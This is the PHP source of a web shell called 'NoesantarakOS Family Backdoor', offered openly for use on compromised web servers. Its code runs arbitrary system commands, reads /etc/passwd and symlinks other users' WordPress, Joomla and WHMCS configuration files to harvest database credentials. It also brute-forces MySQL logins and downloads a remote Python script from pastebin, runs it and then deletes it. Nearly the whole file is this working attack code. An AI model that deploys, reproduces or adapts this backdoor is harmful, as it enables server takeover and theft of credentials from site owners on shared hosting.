NosantaraOs Backdoor

1. <!DOCTYPE HTML>
2. <html lang="en" class="no-js">
3. <HEAD>
4. <title>-:- AmateurS666h05t Shell -:-</title>
5. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
6. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
7. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
8. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/-yKAYJuGA9dc/V1BXHLL2SaI/AAAAAAAAABY/fKEVg9XGZr0D2uiqmp2LCBHe65gSDHMMACCo/s512/icon-sc0.jpg" type="image/x-icon">
9. <meta name='author' content='NoesantarakOS Family'>
10. <meta charset="UTF-8">
11. <style type="text/css">
12. body {
13. background: #000000;
14. color: springgreen;
15. font-family :Homenaje;
16. }
17.  
18. #content .first{
19. background-color: black;
20. }
21.  
22. a{
23. color: white;
24. text-decoration: none;
25. }
26.  
27. input,select,textarea{
28. border: 1px #000000 solid;
29. -moz-border-radius: 5px;
30. -webkit-border-radius:5px;
31. border-radius:5px;
32. }
33.  
34. #menu{
35. background:#000000;
36. margin:8px 2px 4px 2px;
37. font-family:Fredericka the Great;
38. font-size:14px;
39. color:silver;
40. }
41. #menu a{
42. padding:3px 6px;
43. margin:1;
44. background:#2d2b2b;
45. text-decoration:none;
46. letter-spacing:2px;
47. -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
48. }
49. #menu a:hover{
50. background:black;
51. border-bottom:1px solid #ffffff;
52. border-top:1px solid #ffffff;
53. }
54. .tombolupil{
55. background:black;
56. color:white;
57. margin:0 10px;
58. font-family:Homenaje;
59. font-size:16px;
60. border:2px solid crimson;
61. }
62. .tombolupil:hover{
63. background:crimson;
64. color:white;
65. margin:0 10px;
66. font-family:Homenaje;
67. font-size:16px;
68. border:2px solid crimson;
69. }
70. .bordergaya{
71. background:black;
72. color:white;
73. margin:0 10px;
74. font-family:Homenaje;
75. font-size:16px;
76. border:2px solid #2d2b2b;
77. }
78. .bordergaya:hover{
79. background:#2d2b2b;
80. color:white;
81. margin:0 10px;
82. font-family:Homenaje;
83. font-size:16px;
84. border:2px solid crimson;
85. }
86.  
87. .justborder{
88. background:black;
89. color:white;
90. margin:0 10px;
91. font-family:Homenaje;
92. font-size:16px;
93. border:2px solid #2d2b2b;
94. }
95. </style>
96. </HEAD>
97. <BODY>
98. <center>
99. <?php
100.  
101. /*
102. NoesantarakOS 2kl7 Backdoor
103. By AmateurS666h05t
104. */
105.  
106. /*
107. Terimakasih Untuk Orang - Orang Yang Sudah Membantu Sehingga Terciptanya Web Shell Ini
108. Jujur Saja kami hanya memanfaatkan function dan tools yang di ambil dari shell yang sudah ada Sebelumnya. Jadi Shell Ini Tidak 100% Hasil Codingan AmateurS666h05t
109. Untuk AnonGhost, Gantengers Crew, Virusa Worm, S1r_V1ru5, Shor7cut, k2ll3d, IndoXploit, Sinkaroid, Ferupuk, 3xp1r3 Cyber Army, Stupidc0de & Yang Lainnya Yang Tidak Bisa Saya Sebutkan Satu-Persatu Saya Ucapkan "ThankYou Verry Much" Atas Toolsnya. Saya Ucapkan Sekali Lagi Terimakasih.
110.  
111. Jika Ada Yang Kurang Berkenan dihati silahkan kontak saya di :
112. - Email : nandarrh51@gmail.com
113. - https://www.facebook.com/NdarCoolz
114. */
115.  
116. set_time_limit(0);
117. error_reporting(0);
118. if(get_magic_quotes_gpc()){
119. foreach($_POST as $key=>$value){
120. $_POST[$key] = stripslashes($value);
121. }
122. }
123.  
124. /* info server */
125.  
126. $self=$_SERVER['PHP_SELF'];
127. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
128. $your_ip=$_SERVER['REMOTE_ADDR'];
129. $srvr_ip=$_SERVER['SERVER_ADDR'];
130. $admin=$_SERVER['SERVER_ADMIN'];
131.  
132.  
133. //////all functions disini tempatnya/////
134. function exe($cmd) {
135. if(function_exists('system')) {
136. @ob_start();
137. @system($cmd);
138. $buff = @ob_get_contents();
139. @ob_end_clean();
140. return $buff;
141. } elseif(function_exists('exec')) {
142. @exec($cmd,$results);
143. $buff = "";
144. foreach($results as $result) {
145. $buff .= $result;
146. } return $buff;
147. } elseif(function_exists('passthru')) {
148. @ob_start();
149. @passthru($cmd);
150. $buff = @ob_get_contents();
151. @ob_end_clean();
152. return $buff;
153. } elseif(function_exists('shell_exec')) {
154. $buff = @shell_exec($cmd);
155. return $buff;
156. }
157. }
158.  
159. function perms($file){
160. $perms = fileperms($file);
161.  
162.  
163. if (($perms & 0xC000) == 0xC000) {
164. // Socket
165. $info = 's';
166. } elseif (($perms & 0xA000) == 0xA000) {
167. // Symbolic Link
168. $info = 'l';
169. } elseif (($perms & 0x8000) == 0x8000) {
170. // Regular
171. $info = '-';
172. } elseif (($perms & 0x6000) == 0x6000) {
173. // Block special
174. $info = 'b';
175. } elseif (($perms & 0x4000) == 0x4000) {
176. // Directory
177. $info = 'd';
178. } elseif (($perms & 0x2000) == 0x2000) {
179. // Character special
180. $info = 'c';
181. } elseif (($perms & 0x1000) == 0x1000) {
182. // FIFO pipe
183. $info = 'p';
184. } else {
185. // Unknown
186. $info = 'u';
187. }
188.  
189. // Owner
190. $info .= (($perms & 0x0100) ? 'r' : '-');
191. $info .= (($perms & 0x0080) ? 'w' : '-');
192. $info .= (($perms & 0x0040) ?
193. (($perms & 0x0800) ? 's' : 'x' ) :
194. (($perms & 0x0800) ? 'S' : '-'));
195.  
196. // Group
197. $info .= (($perms & 0x0020) ? 'r' : '-');
198. $info .= (($perms & 0x0010) ? 'w' : '-');
199. $info .= (($perms & 0x0008) ?
200. (($perms & 0x0400) ? 's' : 'x' ) :
201. (($perms & 0x0400) ? 'S' : '-'));
202.  
203. // World
204. $info .= (($perms & 0x0004) ? 'r' : '-');
205. $info .= (($perms & 0x0002) ? 'w' : '-');
206. $info .= (($perms & 0x0001) ?
207. (($perms & 0x0200) ? 't' : 'x' ) :
208. (($perms & 0x0200) ? 'T' : '-'));
209.  
210. return $info;
211. }
212.  
213. function getfile($urlfile, $content) {
214. $fp = fopen($content, "w");
215. $ch = curl_init();
216. curl_setopt($ch, CURLOPT_URL, $urlfile);
217. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
218. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
219. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
220. curl_setopt($ch, CURLOPT_FILE, $fp);
221. return curl_exec($ch);
222. curl_close($ch);
223. fclose($fp);
224. ob_flush();
225. flush();
226. }
227. //////////////END Functions Biar Rapih////////////////////
228.  
229. ///////////////////ZONE-H////////////////
230. $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== ";
231.  
232.  
233. /*STYLE UPIL BRO BIAR KEKINIAN*/
234.  
235. echo '<style>
236. .js .inputfile {
237. width: 0.1px;
238. height: 0.1px;
239. opacity: 0;
240. overflow: hidden;
241. position: absolute;
242. z-index: -1;
243. }
244.  
245. .inputfile + label {
246. max-width: 80%;
247. font-size: 1.25rem;
248. /* 20px */
249. font-weight: 700;
250. text-overflow: ellipsis;
251. white-space: nowrap;
252. cursor: pointer;
253. display: inline-block;
254. overflow: hidden;
255. padding: 0.625rem 1.25rem;
256. /* 10px 20px */
257. }
258.  
259. .no-js .inputfile + label {
260. display: none;
261. }
262.  
263. .inputfile:focus + label,
264. .inputfile.has-focus + label {
265. outline: 1px dotted #000;
266. outline: -webkit-focus-ring-color auto 5px;
267. }
268.  
269. .inputfile + label * {
270. /* pointer-events: none; */
271. /* in case of FastClick lib use */
272. }
273.  
274. .inputfile + label svg {
275. width: 1em;
276. height: 1em;
277. vertical-align: middle;
278. fill: currentColor;
279. margin-top: -0.25em;
280. /* 4px */
281. margin-right: 0.25em;
282. /* 4px */
283. }
284.  
285. /* style 4 */
286.  
287. .inputfile-4 + label {
288. color: white;
289. font-family:Homenaje;
290. font-size:15px;
291. }
292.  
293. .inputfile-4:focus + label,
294. .inputfile-4.has-focus + label,
295. .inputfile-4 + label:hover {
296. color: crimson;
297. }
298.  
299. .inputfile-4 + label figure {
300. width: 50px;
301. height: 50px;
302. border-radius: 25%;
303. background-color: crimson;
304. display: block;
305. padding: 10px;
306. margin: 0 auto 10px;
307. }
308.  
309. .inputfile-4:focus + label figure,
310. .inputfile-4.has-focus + label figure,
311. .inputfile-4 + label:hover figure {
312. background-color: white;
313. }
314.  
315. .inputfile-4 + label svg {
316. width: 100%;
317. height: 100%;
318. fill: black;
319. }
320.  
321. .rapihbanget{
322. text-align: left;
323. font-size: 16px;
324. color: springgreen;
325. font-family: Homenaje;
326. margin-left: 38%;
327. }
328. .kecew{
329. text-align: left;
330. font-size: 15px;
331. color: white;
332. font-family: Homenaje;
333. }
334. </style>
335. <script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>
336. ';
337.  
338. echo"<br/>
339. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
340. *-~'`^'*u_ _u*'^`'~-*,
341. p!^ / jPw w9j \ ^!p
342. w^.._ / '\_ _/' \ _.^w
343. *_ / \_ _ _ _/ \ _*
344. q / / \q ( `---` ) p/ \ \ p
345. jj5****._ / ^\_) o o (_/^ \ _.****6jj
346. *_ / '==) ;; (==' \ _*
347. `/.w***, /( )\ ,***w.\'
348. ^ ^c/ ) ( \c^ ^
349. 'V')_)(_('V'</pre>";
350. echo "<center><br><font color='Crimson' size='6px' face='Fredericka the Great'>&hearts; NoesantarakOS Family Backdoor &hearts;</font></center>";
351. echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] By AmateurS666h05t [+]</font></center><br/>";
352.  
353. /** info kernel */
354. echo"
355. <font size='4' color='Teal' face='Jolly Lodger'>
356. <center>".php_uname()."<br>
357. ".$software = getenv("SERVER_SOFTWARE");
358. echo"<p>";
359.  
360. echo"
361. <font size='3.5' color='white'><p>
362. Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
363.  
364. </font>
365. </font>
366. </div>
367. </td>
368. </tr>
369. </tbody>
370. </table></div>
371. </font>";
372.  
373. $disablefunctions = @ini_get("disable_functions");
374. $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled For This Server! ~_^</font>";
375. echo '<br/><font size="4" style="font-family:Jolly Lodger; color:teal;">
376. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>';
377.  
378.  
379. echo '<br/><font size="4" style="font-family:Jolly Lodger;">
380. <tr><td> Your Path Location :';
381.  
382. //////////////////////
383. //CWD MULAI DISINI//
384. ////////////////////
385.  
386. if(isset($_GET['path'])){
387. $path = $_GET['path'];
388. }else{
389. $path = getcwd();
390. }
391. $path = str_replace('\\','/',$path);
392. $paths = explode('/',$path);
393.  
394. foreach($paths as $id=>$pat){
395. if($pat == '' && $id == 0){
396. $a = true;
397. echo '<a href="?path=/">/</a>';
398. continue;
399. }
400. if($pat == '') continue;
401. echo '<a href="?path=';
402. for($i=0;$i<=$id;$i++){
403. echo "$paths[$i]";
404. if($i != $id) echo "/";
405. }
406. echo '">'.$pat.'</a>/';
407. }
408. echo '</font>';
409.  
410. ?>
411.  
412. <!- menu utama ->
413. <br><center><div id="menu">
414. [<a href="?">Home</a>] <font color=orange>=</font>
415. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
416. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
417. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
418. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
419. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
420. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
421. <br><br>
422. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
423. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
424. <!--[<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Web Killer</a>] <font color=orange>-</font>-->
425. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
426. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
427. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper tool</a>] <font color=orange>=</font>
428. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
429. </div></center>
430. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
431.  
432. <?php
433.  
434. /*
435. Lihat File
436. Dimulai Dari Sini
437. */
438. if(isset($_GET['filesrc'])){
439. echo "<br /><tr><td>You Are Looking : ";
440. echo $_GET['filesrc'];
441. echo '</tr></td></table>';
442. echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
443. break;
444. }
445.  
446.  
447. /*
448. permission
449. Dimulai Dari Sini
450. */
451.  
452. elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
453. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
454. if($_POST['opt'] == 'chmod'){
455. if(isset($_POST['perm'])){
456. if(chmod($_POST['path'],$_POST['perm'])){
457. echo '<script>alert("Change Permission Sukses!");</script>';
458. }else{
459. echo '<script>alert("Change Permission Gagal!");</script>';
460. }
461. }
462. echo '<form method="POST">
463. Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
464. <input type="hidden" name="path" value="'.$_POST['path'].'">
465. <input type="hidden" name="opt" value="chmod">
466. <input class="bordergaya" type="submit" value="Go" />
467. </form>';
468. }elseif($_POST['opt'] == 'rename'){
469. if(isset($_POST['newname'])){
470. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
471. echo '<script>alert("Change Name Sukses!");</script>';
472. }else{
473. echo '<script>alert("Change Name Gagal!");</script>';
474. }
475. $_POST['name'] = $_POST['newname'];
476. }
477. echo '<form method="POST">
478. New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
479. <input type="hidden" name="path" value="'.$_POST['path'].'">
480. <input type="hidden" name="opt" value="rename">
481. <input class="bordergaya" type="submit" value="Go" />
482. </form>';
483. }elseif($_POST['opt'] == 'edit'){
484. if(isset($_POST['src'])){
485. $fp = fopen($_POST['path'],'w');
486. if(fwrite($fp,$_POST['src'])){
487. echo '<script>alert("Edit File Sukses!");</script>';
488. }else{
489. echo '<script>alert("Edit File Gagal!");</script>';
490. }
491. fclose($fp);
492. }
493. echo '<form method="POST">
494. <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
495. <input type="hidden" name="path" value="'.$_POST['path'].'">
496. <input type="hidden" name="opt" value="edit">
497. <input class="bordergaya" type="submit" value="Go" />
498. </form>';
499. }
500. echo '</center>';
501. break;
502. }
503.  
504.  
505. /*
506. Config Grabber
507. Dimulai Dari Sini
508. */
509.  
510. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
511.  
512. echo "
513. <form method='POST'>
514. </head>
515. <style>
516. textarea {
517. resize:none;
518. color: #000000 ;
519. background-color:#000000;
520. font-size:8pt; color:#ffffff;
521. border:1px solid white ;
522. border-left: 4px solid white ;
523. width:543px;
524. height:400px;
525. }
526. input {
527. color: #000000;
528. border:1px dotted white;
529. }
530. </style>";
531. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Stupidc0de-Conf', 0755);@chdir('Stupidc0de-Conf');
532. $htaccess="
533. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
534. Options Indexes FollowSymLinks
535. ForceType text/plain
536. AddType text/plain .php
537. AddType text/plain .html
538. AddType text/html .shtml
539. AddType txt .php
540. AddHandler server-parsed .php
541. AddHandler txt .php
542. AddHandler txt .html
543. AddHandler txt .shtml
544. Options All
545. Options All";
546. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
547. $passwd=explode("\n",$passwd);
548. echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>";
549. foreach($passwd as $pwd){
550. $pawd=explode(":",$pwd);$user =$pawd[0];
551. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
552. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
553. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
554. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
555. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
556. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
557. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
558. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
559. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
560. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
561. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
562. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
563. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
564. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
565. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
566. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
567. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
568. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
569. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
570. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
571. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
572. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
573. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
574. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
575. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
576. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
577. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
578. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
579. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
580. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
581. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
582. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
583. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
584. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
585. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
586. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
587. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
588. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
589. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
590. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
591. echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="Stupidc0de-Conf">Hajar Config</a></font></b>';}
592. break;
593. }
594. /////// Cukup Sampai Disini ya Grabber :( ////////
595.  
596. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
597. ///////////////////////////////////////////////START OF ALL CPANEL TOOLS/////////////////////////////////////////////////////////////////////
598. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
599.  
600.  
601. /// start cpanel brute
602. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
603. {
604. ?>
605. <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
606. <?php
607.  
608. @set_time_limit(0);
609. @error_reporting(0);
610.  
611.  
612. if($_POST['page']=='find')
613. {
614. if(isset($_POST['usernames']) && isset($_POST['passwords']))
615. {
616. if($_POST['type'] == 'passwd'){
617. $e = explode("\n",$_POST['usernames']);
618. foreach($e as $value){
619. $k = explode(":",$value);
620. $username .= $k['0']." ";
621. }
622. }elseif($_POST['type'] == 'simple'){
623. $username = str_replace("\n",' ',$_POST['usernames']);
624. }
625. $a1 = explode(" ",$username);
626. $a2 = explode("\n",$_POST['passwords']);
627. $id2 = count($a2);
628. $ok = 0;
629. foreach($a1 as $user )
630. {
631. if($user !== '')
632. {
633. $user=trim($user);
634. for($i=0;$i<=$id2;$i++)
635. {
636. $pass = trim($a2[$i]);
637. if(@mysql_connect('localhost',$user,$pass))
638. {
639. echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
640. $ok++;
641. }
642. }
643. }
644. }
645. echo "<hr><b>You Found <font color=red>$ok</font> By Stupidc0de</b>";
646. echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
647. exit;
648. }
649. }
650. if($_POST['pass']=='password'){
651. @error_reporting(0);
652. $i = getenv('REMOTE_ADDR');
653. $d = date('D, M jS, Y H:i',time());
654. $h = $_SERVER['HTTP_HOST'];
655. $dir=$_SERVER['PHP_SELF'];
656. mkdir('config',0755);
657. $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98");
658. $file = fopen("cp.py","w+");
659. $write = fwrite ($file ,$cp);
660. fclose($file);
661. chmod("cp.py",0755);
662. $url = $_POST['url'];
663. echo"<center>
664. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
665. system("python cp.py $url config");
666. unlink ('cp.py');
667. echo"</textarea>
668. </center>";
669. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
670. exit;
671. }
672. if($_POST['mendapatkan']=='passwd'){
673. @set_magic_quotes_runtime(0);
674. ob_start();
675. error_reporting(0);
676. @set_time_limit(0);
677. @ini_set('max_execution_time',0);
678. @ini_set('output_buffering',0);
679. $fn = $_POST['foldername'];
680. //all function here
681.  
682. function syml($usern,$pdomain)
683. {
684. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
685. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
686. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
687. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
688. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
689. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
690. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
691. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
692. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
693. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
694. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
695. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
696. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
697. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
698. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
699. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
700. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
701. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
702. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
703. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
704. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
705. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
706. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
707. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
708. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
709. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
710. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
711. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
712. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
713. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
714. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
715. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
716. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
717. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
718. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
719. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
720. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
721. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
722. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
